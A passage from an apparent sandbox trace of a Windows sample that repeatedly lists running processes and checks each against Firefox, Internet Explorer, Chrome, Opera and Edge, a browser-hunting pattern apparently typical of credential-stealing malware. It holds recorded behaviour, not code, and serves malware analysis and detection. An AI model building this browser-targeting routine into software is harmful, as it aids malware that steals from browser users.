(lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0229.706] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0229.706] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.706] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0229.707] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0229.707] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0229.707] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0229.707] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0229.707] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.707] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0229.707] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0229.707] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0229.707] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0229.707] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0229.709] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.709] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0229.710] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0229.710] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0229.710] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0229.710] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0229.710] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.710] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0229.710] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0229.711] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0229.711] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0229.711] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0229.711] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.711] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0229.711] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0229.711] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0229.711] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0229.711] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0229.711] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.711] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0229.712] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0229.712] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0229.712] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0229.712] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0229.712] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.712] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0229.712] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0229.712] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0229.712] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0229.712] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0229.712] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.712] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0229.713] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0229.713] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0229.713] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0229.713] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0229.713] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.713] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0229.713] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0229.713] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0229.713] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0229.714] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0229.714] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.714] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0229.714] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0229.714] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0229.714] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0229.714] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0229.714] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.714] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0229.715] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0229.715] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0229.715] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0229.715] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0229.715] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.715] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0229.715] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0229.715] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0229.715] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0229.715] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0229.715] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.715] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0229.716] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0229.716] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0229.716] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0229.716] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0229.716] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.716] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0229.716] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0229.716] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0229.716] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0229.716] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0229.716] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.716] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0229.717] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0229.717] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0229.717] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0229.717] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0229.717] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.717] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.717] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0229.718] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0229.718] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0229.718] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0229.718] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.718] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.718] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.718] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.718] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.718] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.718] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.718] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0229.719] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0229.719] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0229.719] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0229.719] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0229.719] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.719] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.719] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.719] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.719] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.719] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.719] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.720] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.720] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0229.720] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0229.720] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0229.720] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0229.720] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.720] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.721] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.721] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.721] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.721] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0229.721] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.721] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.721] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0229.721] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0229.721] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0229.721] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0229.721] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.721] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.722] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0229.722] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0229.722] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0229.722] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0229.722] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.722] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.722] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.722] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.722] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.722] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0229.722] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.722] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.723] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0229.723] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.723] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.724] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.724] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.724] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.724] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0229.724] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.724] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0229.725] CloseHandle (hObject=0xe8) returned 1 [0229.725] Sleep (dwMilliseconds=0x3e8) [0230.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0230.734] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.735] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0230.735] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0230.735] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0230.735] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0230.735] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0230.735] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.735] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0230.735] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0230.735] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0230.735] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0230.735] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0230.736] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.736] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0230.736] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0230.736] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0230.736] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0230.736] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.736] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.737] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0230.737] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0230.737] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0230.737] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0230.737] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.737] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.737] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0230.737] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0230.737] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0230.737] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0230.737] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.737] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.738] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0230.738] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0230.738] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0230.738] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0230.738] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.738] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.738] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0230.738] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0230.738] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0230.738] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0230.738] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.739] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.739] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0230.739] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0230.739] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0230.739] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0230.739] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.739] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.740] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0230.740] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0230.740] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0230.740] lstrcmpiA (lpString1="lsass.exe", 